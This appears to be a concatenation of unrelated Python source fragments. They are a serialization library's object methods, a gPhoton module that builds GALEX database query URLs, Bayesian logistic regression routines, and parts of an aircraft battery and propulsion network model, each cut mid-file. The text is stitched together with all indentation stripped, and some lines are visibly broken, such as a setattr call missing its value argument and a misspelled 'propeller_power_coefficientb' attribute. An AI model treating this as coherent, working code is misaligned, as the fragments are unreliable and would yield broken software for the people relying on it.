except TypeError as e:
label = '\n - %s.%s: ' % (qualified_name(type(self)), k)
if e.args:
e.args = tuple(
chain(
(label + e.args[0],),
e.args[1:]
)
)
else:
e.args = (label + serialize(_),)
raise e
else:
if isinstance(_, IOBase):
if hasattr(_, 'url'):
serial.meta.url(self, _.url)
elif hasattr(_, 'name'):
serial.meta.url(self, urljoin('file:', _.name))
_, f = detect_format(_)
if isinstance(_, dict):
for k, v in _.items():
if v is None:
v = serial.properties.NULL
try:
self[k] = v
except KeyError as e:
if e.args and len(e.args) == 1:
e.args = (
r'%s.%s: %s' % (qualified_name(type(self)), e.args[0], json.dumps(_)),
)
raise e
else:
_dir = tuple(p for p in dir(_) if p[0] != '_')
for p in serial.meta.writable(self.__class__).properties.keys():
if p in _dir:
setattr(self, getattr(_, p))
if f is not None:
serial.meta.format_(self, f)
def __setattr__(self, property_name, value):
# type: (Object, str, Any) -> properties_.NoneType
if property_name[0] != '_':
try:
property_definition = serial.meta.read(self).properties[property_name]
try:
value = property_definition.unmarshal(value)
if isinstance(value, Generator):
value = tuple(value)
except (TypeError, ValueError) as e:
message = '\n - %s.%s: ' % (
qualified_name(type(self)),
property_name
)
if e.args and isinstance(e.args[0], str):
e.args = tuple(
chain(
(message + e.args[0],),
e.args[1:]
)
)
else:
e.args = (message + repr(value),)
raise e
except KeyError as e:
if value is not None:
raise e
super().__setattr__(property_name, value)
def __setitem__(self, key, value):
# type: (str, str) -> None
m = serial.meta.read(self)
if key in m.properties:
property_name = key
else:
property_name = None
for pn, pd in m.properties.items():
if key == pd.name:
property_name = pn
break
if property_name is None:
raise KeyError(
'`%s` has no property mapped to the name "%s"' % (
qualified_name(type(self)),
key
)
)
setattr(self, property_name, value)
def __getitem__(self, key):
# type: (str, str) -> None
m = serial.meta.read(self)
if key in m.properties:
property_name = key
else:
property_definition = None
property_name = None
for pn, pd in m.properties.items():
if key == pd.name:
property_name = pn
property_definition = pd
break
if property_definition is None:
raise KeyError(
'`%s` has no property mapped to the name "%s"' % (
qualified_name(type(self)),
key
)
)
return getattr(self, property_name)
def __copy__(self):
# type: () -> Object
return self.__class__(self)
def __deepcopy__(self, memo=None):
# type: (Optional[dict]) -> Object
new_instance = self.__class__()
im = serial.meta.read(self)
cm = serial.meta.read(type(self))
if im is cm:
m = cm # type: serial.meta.Object
else:
serial.meta.write(new_instance, deepcopy(im, memo=memo))
m = im # type: serial.meta.Object
ih = serial.hooks.read(self)
ch = serial.hooks.read(type(self))
if ih is not ch:
serial.hooks.write(new_instance, deepcopy(ih, memo=memo))
if m is not None:
for k in m.properties.keys():
try:
v = getattr(self, k)
if v is not None:
if not isinstance(v, Callable):
v = deepcopy(v, memo=memo)
setattr(new_instance, k, v)
except TypeError as e:
label = '%s.%s: ' % (qualified_name(type(self)), k)
if e.args:
e.args = tuple(
chain(
(label + e.args[0],),
e.args[1:]
)
)
else:
e.args = (label + serialize(self),)
raise e
return new_instance
def _marshal(self):
o = self
h = serial.hooks.read(o)
if (h is not None) and (h.before_marshal is not None):
o = h.before_marshal(o)
data = OrderedDict()
m = serial.meta.read(o)
for pn, p in m.properties.items():
v = getattr(o, pn)
if v is not None:
k = p.name or pn
data[k] = p.marshal(v)
if (h is not None) and (h.after_marshal is not None):
data = h.after_marshal(data)
return data
def __str__(self):
return serialize(self)
def __repr__(self):
representation = [
'%s(' % qualified_name(type(self))
]
m = serial.meta.read(self)
for p in m.properties.keys():
v = getattr(self, p)
if v is not None:
rv = (
qualified_name(v)
if isinstance(v, type) else
repr(v)
)
rvls = rv.split('\n')
if len(rvls) > 2:
rvs = [rvls[0]]
for rvl in rvls[1:]:
rvs.append(' ' + rvl)
rv = '\n'.join(rvs)
representation.append(
' %s=%s,' % (p, rv)
)
representation.append(')')
if len(representation) > 2:
return '\n'.join(representation)
else:
return ''.join(representation)
def __eq__(self, other):
# type: (Any) -> bool
if type(self) is not type(other):
return False
m = serial.meta.read(self)
om = serial.meta.read(other)
self_properties = set(m.properties.keys())
other_properties = set(om.properties.keys())
for p in self_properties|other_properties:
v = getattr(self, p)
ov = getattr(other, p)
if v != ov:
return False
return True
def __ne__(self, other):
# type: (Any) -> bool
return False if self == other else True
def __iter__(self):
m = serial.meta.read(self)
for k, p in m.properties.items():
yield p.name or k
def _validate(self, raise_errors=True):
# type: (Callable, bool, Optional[list]) -> None
errors = []
o = self
h = serial.hooks.read(self)
if (h is not None) and (h.before_validate is not None):
o = h.before_validate(o)
m = serial.meta.read(o)
for pn, p in m.properties.items():
v = getattr(o, pn)
if v is None:
if isinstance(p.required, Callable):
required = p.required(o)
else:
required = p.required
if required:
errors.append('The property `%s` is required for `%s`:\n%s' % (pn, qualified_name(type(o)), str(o)))
else:
if v is serial.properties.NULL:
types = p.types
if isinstance(types, collections.Callable):
types = types(v)
if types is not None:
if (str in types) and (native_str is not str) and (native_str not in types):
types = tuple(chain(*(
((t, native_str) if (t is str) else (t,))
for t in types
)))
if serial.properties.Null not in types:
errors.append(
'Null values are not allowed in `%s.%s`, ' % (qualified_name(type(o)), pn) +
'permitted types include: %s.' % ', '.join(
'`%s`' % qualified_name(t) for t in types
)
)
else:
try:
errors.extend(validate(v, p.types, raise_errors=False))
except serial.errors.ValidationError as e:
message = '%s.%s:\n' % (qualified_name(type(o)), pn)
if e.args:
e.args = tuple(chain(
(e.args[0] + message,),
e.args[1:]
))
else:
e.args = (
message,
)
if (h is not None) and (h.after_validate is not None):
o = h.after_validate(o)
if raise_errors and errors:
raise serial.errors.ValidationError('\n'.join(errors))
return errors
class Array(list, Model):
_format = None | |
"""
.. module:: gQuery
:synopsis: Defines and constructs common queries that are passed to the
GALEX databases (esp: photon, aspect, and MCAT) at MAST.
"""
from __future__ import absolute_import, division, print_function
# Core and Third Party imports.
from builtins import str
# gPhoton imports.
import gPhoton.CalUtils as CalUtils
from gPhoton.MCUtils import manage_requests2
from gPhoton.galextools import isPostCSP
from gPhoton import time_id
# ------------------------------------------------------------------------------
# To save space, times in the database are "integer-ized" by multiplying by 1000
tscale = 1000.
# The following three global variables are used in constructing a properly
# formatted query to the MAST database. Don't change them unless you know what
# you're doing!
baseURL = ('https://mastcomp.stsci.edu/portal/Mashup/MashupQuery.asmx/Galex'
'PhotonListQueryTest?query=')
baseDB = 'GPFCore.dbo'
MCATDB = 'GR6Plus7.dbo'
# All queries from the same _run_ of the photon tools should have identical
# time_id, providing a quick way to troubleshoot issues on the server side.
formatURL = ' -- '+str(time_id)+'&format=extjs'
# ------------------------------------------------------------------------------
# The photon even timestamps are stored in the database at the precision level
# of SQL's BIGINT. This truncated (not rounded) some timestamps at the level
# of 1ms. Most timestamps have a resolution of only 5ms except for rare high
# resolution visits, and even in that case the extra precision does not
# matter for science. To make gAperture consistent with the database, we'll
# truncate times at 1ms for queries.
def truncate(n):
return str(n*tscale).split('.')[0]
# ------------------------------------------------------------------------------
def hasNaN(query):
"""
Check if there is NaN in a query (or any string) and, if so, raise an
exception because that probably indicates that something has gone wrong.
:param query: The query string to check.
:type query: str
"""
if 'NaN' in query:
raise RuntimeError("Malformed query: contains NaN values.")
return
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def getValue(query, verbose=0, retries=100):
"""
Manage a database call which returns a single value.
:param query: The query to run.
:type query: str
:param verbose: Verbosity level, a value of 0 is minimum verbosity.
:type verbose: int
:param retries: Number of query retries to attempt before giving up.
:type retries: int
:returns: requests.Response or None -- The response from the server. If the
query does not receive a response, returns None.
"""
hasNaN(query)
out = manage_requests2(query, maxcnt=retries, verbose=verbose)
if out is not None:
try:
out = float(out.json()['data']['Tables'][0]['Rows'][0][0])
except ValueError:
try:
out = str(out.json()['data']['Tables'][0]['Rows'][0][0])
except:
print('Failed: {q}'.format(q=query))
raise
except:
print('Failed: {q}'.format(q=query))
raise
return out
else:
print('Failed: {q}'.format(q=query))
raise ValueError("Query never finished on server, run with verbose"
" turned on for more info.")
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def getArray(query, verbose=0, retries=100):
"""
Manage a database call which returns an array of values.
:param query: The query to run.
:type query: str
:param verbose: Verbosity level, a value of 0 is minimum verbosity.
:type verbose: int
:param retries: Number of query retries to attempt before giving up.
:type retries: int
:returns: requests.Response or None -- The response from the server. If the
query does not receive a response, returns None.
"""
hasNaN(query)
out = manage_requests2(query, maxcnt=retries, verbose=verbose)
if out is not None:
try:
out = out.json()['data']['Tables'][0]['Rows']
except:
print('Failed: {q}'.format(q=query))
raise
return out
else:
print('Failed: {q}'.format(q=query))
raise ValueError("Query never finished on server, run with verbose"
" turned on for more info.")
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def mcat_sources(band, ra0, dec0, radius, maglimit=20.):
"""
Return the MCAT coadd sources given sky position and search radius
(and optional lower magnitude limit).
Columns are:
[0,RA],[1,Dec],[2,NUV_mag],[3,FUV_mag],[4,FoV_radius],[5,NUV_skybg],
[6,FUV_skybg],[7,NUV_FWHM_world],[8,FUV_FWHM_world],
[9:15,FUV_mag_aper_1:7],[16:22,NUV_mag_aper_1:7]
[23:29,FUV_magerr_aper_1:7],[30:36,NUV_magerr_aper1:7]
:param band: The band to use, either 'FUV' or 'NUV'.
:type band: str
:param ra0: The right ascension, in degrees, around which to search.
:type ra0: float
:param dec0: The declination, in degrees, around which to search.
:type dec0: float
:param radius: The radius within which to search for MCAT sources, in
degrees.
:type radius: float
:param maglimit: The NUV faint limit to return MCAT sources for.
:type maglimit: float
:returns: str -- The query to submit to the database.
"""
# 1=nuv, 2=fuv, 3=both
bandflag = 1 if band == 'NUV' else 2
# fGetNearbyObjEq takes radius in arcminutes
# [Future]: Add exposure time.
return (
str(baseURL)+
'select ra, dec, nuv_mag, fuv_mag, fov_radius, nuv_skybg, fuv_skybg,'
' nuv_fwhm_world, fuv_fwhm_world, fuv_mag_aper_1, fuv_mag_aper_2,'
' fuv_mag_aper_3, fuv_mag_aper_4, fuv_mag_aper_5, fuv_mag_aper_6,'
' fuv_mag_aper_7, nuv_mag_aper_1, nuv_mag_aper_2, nuv_mag_aper_3,'
' nuv_mag_aper_4, nuv_mag_aper_5, nuv_mag_aper_6, nuv_mag_aper_7'
' fuv_magerr_aper_1, fuv_magerr_aper_2, fuv_magerr_aper_3,'
' fuv_magerr_aper_4, fuv_magerr_aper_5, fuv_magerr_aper_6,'
' fuv_magerr_aper_7, nuv_magerr_aper_1, nuv_magerr_aper_2,'
' nuv_magerr_aper_3, nuv_magerr_aper_4, nuv_magerr_aper_5,'
' nuv_magerr_aper_6, nuv_magerr_aper_7'
' from '+str(MCATDB)+'.photoobjall as p inner join '+str(MCATDB)+
'.photoextract as pe on p.photoextractid=pe.photoextractid inner join '+
str(MCATDB)+'.fgetnearbyobjeq('+repr(float(ra0))+', '+
repr(float(dec0))+', '+
str(radius*60.)+') as nb on p.objid=nb.objid and (band=3 or band='+
str(bandflag)+') and '+str(band)+'_mag<'+str(maglimit)+
str(formatURL))
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def obstype(objid):
"""
Get the dither pattern type based on the object id.
:param objid: The MCAT Object ID to return the observation type data from.
:type objid: long
:returns: str -- The query to submit to the database.
"""
return (
'{baseURL}select distinct vpe.mpstype as survey, vpe.tilename,'
' vpe.photoextractid, vpe.petal, vpe.nlegs, vpe.leg, vpe.eclipse,'
' vpe.img, vpe.subvis from {MCATDB}.visitPhotoextract as vpe inner'
' join {MCATDB}.imgrun as iv on vpe.photoextractid=iv.imgrunid'
' inner join {MCATDB}.visitphotoobjall as p on vpe.photoextractid'
'=p.photoextractid where p.objid={objid}{formatURL}'.format(
baseURL=baseURL, MCATDB=MCATDB, objid=objid, formatURL=formatURL))
# ------------------------------------------------------------------------------
def obstype_from_t(t):
"""
Get the dither pattern type based on the time stamp.
"""
return ("{baseURL}SELECT * from {baseDB}.fGetLegObsType({t})"
"{formatURL}").format(baseURL=baseURL, baseDB=baseDB,
t=truncate(t), formatURL=formatURL)
# -_----------------------------------------------------------------------------
def mcat_visit_sources(ra0, dec0, radius):
"""
Return the MCAT per-visit sources given sky position and search radius.
The columns are as follows:
[0,objid],[1,ra],[2,dec],[3,NUV_mag],[4,FUV_mag],[5,FoV_radius],
[6,NUV_skybg],[7,FUV_skybg],[8,NUV_FWHM],[9,FUV_FWHM],[10,FUV_expt],
[11,NUV_expt],[12:18,FUV_mag_aper_1:7],[19:25,NUV_mag_aper_1:7],
[26:32,FUV_magerr_aper_1:7],[33:39,NUV_magerr_aper_1:7],[40,Nobssecs],
[41,Fobssecs],[42,NUV_artifact],[43,FUV_artifact],[44,FUV_obstart],
[45,FUV_obsend],[46,NUV_obstart],[47,NUV_obsend],
[48,FUV_ALPHA_J2000],[49,FUV_DELTA_J2000],
[50,NUV_ALPHA_J2000],[51,NUV_DELTA_J2000]
:param ra0: The right ascension, in degrees, around which to search.
:type ra0: float
:param dec0: The declination, in degrees, around which to search.
:type dec0: float
:param radius: The radius within which to search for MCAT sources, in
degrees.
:type radius: float
:returns: str -- The query to submit to the database.
"""
return (
"{baseURL}select vpo.objid, ra, dec, nuv_mag, fuv_mag, fov_radius,"
" nuv_skybg, fuv_skybg, nuv_fwhm_world, fuv_fwhm_world,"
" vpe.fexptime, vpe.nexptime, fuv_mag_aper_1, fuv_mag_aper_2,"
" fuv_mag_aper_3, fuv_mag_aper_4, fuv_mag_aper_5, fuv_mag_aper_6,"
" fuv_mag_aper_7, nuv_mag_aper_1, nuv_mag_aper_2, nuv_mag_aper_3,"
" nuv_mag_aper_4, nuv_mag_aper_5, nuv_mag_aper_6, nuv_mag_aper_7,"
" fuv_magerr_aper_1, fuv_magerr_aper_2, fuv_magerr_aper_3,"
" fuv_magerr_aper_4, fuv_magerr_aper_5, fuv_magerr_aper_6,"
" fuv_magerr_aper_7, nuv_magerr_aper_1, nuv_magerr_aper_2,"
" nuv_magerr_aper_3, nuv_magerr_aper_4, nuv_magerr_aper_5,"
" nuv_magerr_aper_6, nuv_magerr_aper_7, nobssecs, fobssecs,"
" nuv_artifact, fuv_artifact, vpe.fexpstar, vpe.fexpend,"
" vpe.nexpstar, vpe.nexpend, FUV_ALPHA_J2000, FUV_DELTA_J2000,"
" NUV_ALPHA_J2000, NUV_DELTA_J2000"
" from {MCATDB}.visitphotoobjall as vpo"
" inner join {MCATDB}.visitphotoextract as vpe on"
" vpo.photoextractid=vpe.photoextractid inner join"
" {MCATDB}.fGetNearbyVisitObjEq({ra0},{dec0},{radius}) as nb on"
" vpo.objid=nb.objid inner join {MCATDB}.imgrun as i on"
" vpe.photoExtractID=i.imgRunID{formatURL}".format(
baseURL=baseURL, MCATDB=MCATDB, ra0=float(ra0), dec0=float(dec0),
radius=radius*60., formatURL=formatURL))
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def mcat_objid_search(objid):
"""
Return a bunch of observation data for a visit level objid (ggoid).
Doing the same for coadd level data is not yet supported.
:param objid: The MCAT Object ID to return the observation data from.
:type objid: long
:returns: str -- The query to submit to the database.
"""
return (
str(baseURL)+'select objid, minPhotoObsDate, maxPhotoObsDate, obs_date,'
' obsdatim, nobssecs, fobssecs, nexptime, fexptime, nexpstar, nexpend,'
' fexpstar, fexpend from '+str(MCATDB)+'.visitphotoobjall as vp inner'
' join '+str(MCATDB)+'.imgrun as ir on vp.photoextractid=ir.imgrunid'
' inner join '+str(MCATDB)+'.visitphotoextract as vpe on'
' vp.photoextractid=vpe.photoextractid where objid = '+
str(int(objid))+str(formatURL))
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def exposure_ranges(band, ra0, dec0, t0=1, t1=10000000000000, detsize=1.25,
epsilon=0.001):
"""
Returns a list of times (in one second increments) where data exists
with an aspect solution within detsize of [ra0,dec0].
:param band: The band to use, either 'FUV' or 'NUV'.
:type band: str
:param ra0: The right ascension, in degrees, around which to search.
:type ra0: float
:param dec0: The declination, in degrees, around which to search.
:type dec0: float
:param t0: The minimum time stamp to search for exposure ranges.
:type t0: long
:param t1: The maximum time stamp to search for exposure ranges.
:type t1: long
:param detsize: Effective diameter, in degrees, of the field-of-view.
:type detsize: float
:param epsilon: Buffer on t1 to avoid missing the end value in the search.
:type epsilon: float
:returns: str -- The query to submit to the database.
"""
# If band is set to False (or equivalent), search on both bands
if not band:
band = 'FUV/NUV'
return (
str(baseURL)+
'select distinct time from '+str(baseDB)+
'.fGetNearbyAspectEq('+repr(float(ra0))+','+repr(float(dec0))+',(('+
str(detsize)+'/2.0)*60.0),'+
truncate(t0)+','+truncate(t1+epsilon)+')'
' where band=\''+str(band)+'\' or band=\'FUV/NUV\' order by time'+
str(formatURL))
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
def exposure_range(band, ra0, dec0, t0=1, | |
)
if len(np.atleast_1d(weights)) != len(np.atleast_1d(y)):
raise ValueError(' weight vector must be same length as response vector')
# calculate log posterior Hessian
mu = logistic_prob(X, w)
S = mu * (1. - mu) * weights
if len(H.shape) == 2:
H_log_post = np.dot(X.T, X * S[:, np.newaxis]) + H
elif len(H.shape) == 1:
H_log_post = np.diag(np.dot(X.T, X * S[:, np.newaxis])) + H
else:
raise ValueError('Incompatible Hessian')
return H_log_post
def HP_log_posterior(w, q, wprior, H, y, X, weights=None):
"""Returns diagonal Hessian of the negative log posterior probability multiplied by an arbitrary vector.
This is useful for the Newton-CG solver, particularly when we only want to store a diagonal Hessian.
Parameters
----------
w : array-like, shape (p, )
parameter vector at which the Hessian is to be evaluated
q : array-like, shape (p, )
arbitrary vector to multiply Hessian by
wprior : array-like, shape (p, )
array of prior means on the parameters to be fit
H : array-like, shape (p, )
array of diagonal log prior Hessian (inverse covariance of prior distribution of parameters)
y : array-like, shape (N, )
array of binary ({0,1} responses)
X : array-like, shape (N, p)
array of features
weights : array-like, shape (N, )
array of data point weights. Should be within [0,1]
Returns
-------
HP : array-like, shape (p, )
Hessian of log posterior (diagonal approx) multiplied by arbitrary vector
References
----------
Chapter 8 of <NAME>. 'Machine Learning a Probabilistic Perspective', MIT Press (2012)
Chapter 4 of Bishop, C. 'Pattern Recognition and Machine Learning', Springer (2006)
"""
# fill in weights if need be
if weights is None:
weights = np.ones(len(np.atleast_1d(y)), )
if len(np.atleast_1d(weights)) != len(np.atleast_1d(y)):
raise ValueError(' weight vector must be same length as response vector')
HP = H_log_posterior(w, wprior, H, y, X, weights)
HP = HP * q
return HP
def fit_bayes_logistic(y, X, wprior, H, weights=None, solver='Newton-CG', bounds=None, maxiter=100):
""" Bayesian Logistic Regression Solver. Assumes Laplace (Gaussian) Approximation
to the posterior of the fitted parameter vector. Uses scipy.optimize.minimize
Parameters
----------
y : array-like, shape (N, )
array of binary {0,1} responses
X : array-like, shape (N, p)
array of features
wprior : array-like, shape (p, )
array of prior means on the parameters to be fit
H : array-like, shape (p, p) or (p, )
array of prior Hessian (inverse covariance of prior distribution of parameters)
weights : array-like, shape (N, )
array of data point weights. Should be within [0,1]
solver : string
scipy optimize solver used. this should be either 'Newton-CG', 'BFGS' or 'L-BFGS-B'.
The default is Newton-CG.
bounds : iterable of length p
a length p list (or tuple) of tuples each of length 2.
This is only used if the solver is set to 'L-BFGS-B'. In that case, a tuple
(lower_bound, upper_bound), both floats, is defined for each parameter. See the
scipy.optimize.minimize docs for further information.
maxiter : int
maximum number of iterations for scipy.optimize.minimize solver.
Returns
-------
w_fit : array-like, shape (p, )
posterior parameters (MAP estimate)
H_fit : array-like, shape like `H`
posterior Hessian (Hessian of negative log posterior evaluated at MAP parameters)
References
----------
Chapter 8 of <NAME>. 'Machine Learning a Probabilistic Perspective', MIT Press (2012)
Chapter 4 of <NAME>. 'Pattern Recognition and Machine Learning', Springer (2006)
"""
# Check that dimensionality of inputs agrees
# check X
if len(X.shape) != 2:
raise ValueError('X must be a N*p matrix')
(nX, pX) = X.shape
# check y
if len(y.shape) > 1:
raise ValueError('y must be a vector of shape (p, )')
if len(np.atleast_1d(y)) != nX:
raise ValueError('y and X do not have the same number of rows')
# check wprior
if len(wprior.shape) > 1:
raise ValueError('prior should be a vector of shape (p, )')
if len(np.atleast_1d(wprior)) != pX:
raise ValueError('prior mean has incompatible length')
# check H
if len(H.shape) == 1:
if np.atleast_1d(H).shape[0] != pX:
raise ValueError('prior Hessian is diagonal but has incompatible length')
elif len(H.shape) == 2:
(h1,h2) = np.atleast_2d(H).shape
if h1 != h2:
raise ValueError('prior Hessian must either be a p*p square matrix or a vector or shape (p, ) ')
if h1 != pX:
raise ValueError('prior Hessian is square but has incompatible size')
# fill in weights if need be
if weights is None:
weights = np.ones(len(np.atleast_1d(y)), )
if len(np.atleast_1d(weights)) != len(np.atleast_1d(y)):
raise ValueError(' weight vector must be same length as response vector')
# Do the regression
if solver == 'Newton-CG':
if len(H.shape) == 2:
ww = minimize(f_log_posterior, wprior, args=(wprior, H, y, X, weights), jac=g_log_posterior,
hess=H_log_posterior, method='Newton-CG', options={'maxiter': maxiter})
w_fit = ww.x
H_fit = H_log_posterior(w_fit, wprior, H, y, X, weights)
elif len(H.shape) == 1:
ww = minimize(f_log_posterior, wprior, args=(wprior, H, y, X, weights), jac=g_log_posterior,
hessp=HP_log_posterior, method='Newton-CG', options={'maxiter': maxiter})
w_fit = ww.x
H_fit = H_log_posterior(w_fit, wprior, H, y, X, weights)
else:
raise ValueError(' You must either use the full Hessian or its diagonal as a vector')
elif solver == 'BFGS':
ww = minimize(f_log_posterior, wprior, args=(wprior, H, y, X, weights), jac=g_log_posterior_small,
method='BFGS', options={'maxiter': maxiter})
w_fit = ww.x
H_fit = H_log_posterior(w_fit, wprior, H, y, X, weights)
elif solver == 'L-BFGS-B':
ww = minimize(f_log_posterior, wprior, args=(wprior, H, y, X, weights), jac=g_log_posterior_small,
method='L-BFGS-B', bounds=bounds, options={'maxiter': maxiter})
w_fit = ww.x
H_fit = H_log_posterior(w_fit, wprior, H, y, X, weights)
else:
raise ValueError('Unknown solver specified: "{0}"'.format(solver))
return w_fit, H_fit
def get_pvalues(w, H):
""" Calculates p-values on fitted parameters. This can be used for variable selection by,
for example, discarding every parameter with a p-value less than 0.05 (or some other cutoff)
Parameters
----------
w : array-like, shape (p, )
array of posterior means on the fitted parameters
H : array-like, shape (p, p) or (p, )
array of log posterior Hessian
Returns
-------
pvals : array-like, shape (p, )
array of p-values for each of the fitted parameters
References
----------
Chapter 2 of <NAME>. 'In All Likelihood', Oxford University Press (2013)
Also see: <NAME>. 'Extraction of network topology from multi-electrode recordings: is there
a small world effect', Frontiers in Computational Neuroscience (2011) for a use case of
p-value based variable selection.
"""
# get inverse standard error of each parameter from the square root of the Hessian,
# which is equal to the Fisher information
if len(H.shape) == 2:
inv_std_err = np.sqrt(np.diag(H))
elif len(H.shape) == 1:
inv_std_err = np.sqrt(H)
else:
raise ValueError("Incompatible Hessian provided")
# calculate Wald statistic
z_ = w * inv_std_err
# get p-value by comparing Wald statistic to cdf of Normal distribution
pvals = 2. * (1. - norm.cdf(np.abs(z_)))
return pvals
def bayes_logistic_prob(X, w, H):
""" Posterior predictive logistic regression probability. Uses probit approximation
to the logistic regression sigmoid. Also has overflow prevention via exponent truncation.
Parameters
----------
X : array-like, shape (N, p)
array of covariates
w : array-like, shape (p, )
array of fitted MAP parameters
H : array-like, shape (p, p) or (p, )
array of log posterior Hessian (covariance matrix of fitted MAP parameters)
Returns
-------
pr : array-like, shape (N, )
moderated (by full distribution) logistic probability
References
----------
Chapter 8 of <NAME>. 'Machine Learning a Probabilistic Perspective', MIT Press (2012)
Chapter 4 of <NAME>. 'Pattern Recognition and Machine Learning', Springer (2006)
"""
# set a truncation exponent
trunc = 8. # exp(8)/(1+exp(8)) = 0.9997 which is close enough to 1 as to not matter in most cases.
# unmoderated argument of exponent
z_a = np.dot(X, w)
# find the moderation
if len(H.shape) == 2:
H_inv_ = np.linalg.inv(H)
sig2_a = np.sum(X * np.dot(H_inv_, X.T).T, axis=1)
elif len(H.shape) == 1:
H_inv_ = 1. / H
sig2_a = np.sum(X * (H_inv_ * X), axis=1)
else:
raise ValueError(' You must either use the full Hessian or its diagonal as a vector')
# get the moderation factor. Implicit in here is approximating the logistic sigmoid with
# a probit by setting the probit and sigmoid slopes to be equal at the origin. This is where
# the factor of pi/8 comes from.
kappa_sig2_a = | |
link
battery.inputs.current = -battery.cell.charging_current*n_parallel * np.ones_like(volts)
battery.inputs.voltage = battery.cell.charging_voltage*n_series * np.ones_like(volts)
battery.inputs.power_in = -battery.inputs.current * battery.inputs.voltage
battery.energy_calc(numerics,battery_discharge_flag)
total_prop_thrust = np.zeros((len(volts),3))
total_lift_rotor_thrust = np.zeros((len(volts),3))
P_forward = np.zeros((len(volts),1))
P_lift = np.zeros((len(volts),1))
current_total = battery.cell.charging_current*n_parallel * np.ones_like(volts)
# Pack the conditions for outputs
P = P_forward + P_lift
avionics_payload_power = avionics.outputs.power + payload.outputs.power
pack_battery_conditions(conditions,battery,avionics_payload_power,P)
F_total = total_prop_thrust + total_lift_rotor_thrust
results = Data()
results.thrust_force_vector = F_total
results.vehicle_mass_rate = state.ones_row(1)*0.0
return results
def unpack_unknowns_transition(self,segment):
""" This is an extra set of unknowns which are unpacked from the mission solver and send to the network.
This uses all the motors.
Assumptions:
None
Source:
N/A
Inputs:
state.unknowns.lift_rotor_power_coefficient [None]
state.unknowns.propeller_power_coefficient [None]
state.unknowns.battery_voltage_under_load [volts]
state.unknowns.throttle_lift [0-1]
state.unknowns.throttle [0-1]
Outputs:
state.conditions.propulsion.lift_rotor_power_coefficient [None]
state.conditions.propulsion.propeller_power_coefficient [None]
state.conditions.propulsion.battery_voltage_under_load [volts]
state.conditions.propulsion.throttle_lift [0-1]
state.conditions.propulsion.throttle [0-1]
Properties Used:
N/A
"""
# unpack the ones function
ones_row = segment.state.ones_row
# Unpack the unknowns provided for this network
ss = segment.state
if segment.battery_discharge:
ss.conditions.propulsion.lift_rotor_power_coefficient = segment.state.unknowns.lift_rotor_power_coefficient
ss.conditions.propulsion.propeller_power_coefficient = segment.state.unknowns.propeller_power_coefficient
ss.conditions.propulsion.throttle_lift = segment.state.unknowns.throttle_lift
ss.conditions.propulsion.throttle = segment.state.unknowns.throttle
else:
ss.conditions.propulsion.propeller_power_coefficientb = 0. * ones_row(1)
battery = self.battery
battery.append_battery_unknowns(segment)
return
def unpack_unknowns_cruise(self,segment):
""" This is an extra set of unknowns which are unpacked from the mission solver and send to the network.
This uses only the forward motors and turns the rest off.
Assumptions:
Only the forward motors and turns the rest off.
Source:
N/A
Inputs:
state.unknowns.propeller_power_coefficient [None]
state.unknowns.battery_voltage_under_load [volts]
state.unknowns.throttle_lift [0-1]
state.unknowns.throttle [0-1]
Outputs:
state.conditions.propulsion.propeller_power_coefficient [None]
state.conditions.propulsion.battery_voltage_under_load [volts]
state.conditions.propulsion.throttle_lift [0-1]
state.conditions.propulsion.throttle [0-1]
Properties Used:
N/A
"""
ones_row = segment.state.ones_row
# Unpack the unknowns provided for this network
ss = segment.state
if segment.battery_discharge:
ss.conditions.propulsion.throttle_lift = 0.0 * ones_row(1)
ss.conditions.propulsion.lift_rotor_power_coefficient = 0.0 * ones_row(1)
ss.conditions.propulsion.propeller_power_coefficient = segment.state.unknowns.propeller_power_coefficient
ss.conditions.propulsion.throttle = segment.state.unknowns.throttle
else:
ss.conditions.propulsion.propeller_power_coefficient = 0. * ones_row(1)
battery = self.battery
battery.append_battery_unknowns(segment)
return
def unpack_unknowns_lift(self,segment):
""" This is an extra set of unknowns which are unpacked from the mission solver and send to the network.
This uses only the lift motors.
Assumptions:
Only the lift motors.
Source:
N/A
Inputs:
state.unknowns.propeller_power_coefficient [None]
state.unknowns.battery_voltage_under_load [volts]
state.unknowns.throttle_lift [0-1]
state.unknowns.throttle [0-1]
Outputs:
state.conditions.propulsion.propeller_power_coefficient [None]
state.conditions.propulsion.battery_voltage_under_load [volts]
state.conditions.propulsion.throttle_lift [0-1]
state.conditions.propulsion.throttle [0-1]
Properties Used:
N/A
"""
# unpack the ones function
ones_row = segment.state.ones_row
# Unpack the unknowns provided for this network
ss = segment.state
if segment.battery_discharge:
ss.conditions.propulsion.throttle_lift = segment.state.unknowns.throttle_lift
ss.conditions.propulsion.lift_rotor_power_coefficient = segment.state.unknowns.lift_rotor_power_coefficient
ss.conditions.propulsion.propeller_power_coefficient = 0.0 * ones_row(1)
ss.conditions.propulsion.throttle = 0.0 * ones_row(1)
else:
ss.conditions.propulsion.propeller_power_coefficient = 0.0 * ones_row(1)
ss.conditions.propulsion.throttle_lift = 0.0 * ones_row(1)
ss.conditions.propulsion.lift_rotor_power_coefficient = 0.0 * ones_row(1)
ss.conditions.propulsion.throttle = 0.0 * ones_row(1)
battery = self.battery
battery.append_battery_unknowns(segment)
return
def residuals_transition(self,segment):
""" This packs the residuals to be send to the mission solver.
Use this if all motors are operational
Assumptions:
All motors are operational
Source:
N/A
Inputs:
state.conditions.propulsion:
propeller_motor_torque [N-m]
lift_rotor_motor_torque [N-m]
propeller_torque [N-m]
lift_rotor_torque [N-m]
voltage_under_load [volts]
state.unknowns.battery_voltage_under_load [volts]
Outputs:
None
Properties Used:
self.voltage [volts]
"""
if segment.battery_discharge:
q_propeller_motor = segment.state.conditions.propulsion.propeller_motor_torque
q_prop_forward = segment.state.conditions.propulsion.propeller_torque
q_lift_rotor_motor = segment.state.conditions.propulsion.lift_rotor_motor_torque
q_prop_lift = segment.state.conditions.propulsion.lift_rotor_torque
segment.state.residuals.network.propellers = (q_propeller_motor - q_prop_forward)
segment.state.residuals.network.lift_rotors = (q_lift_rotor_motor - q_prop_lift)
network = self
battery = self.battery
battery.append_battery_residuals(segment,network)
return
def residuals_cruise(self,segment):
""" This packs the residuals to be send to the mission solver.
Use this if only the forward motors are operational
Assumptions:
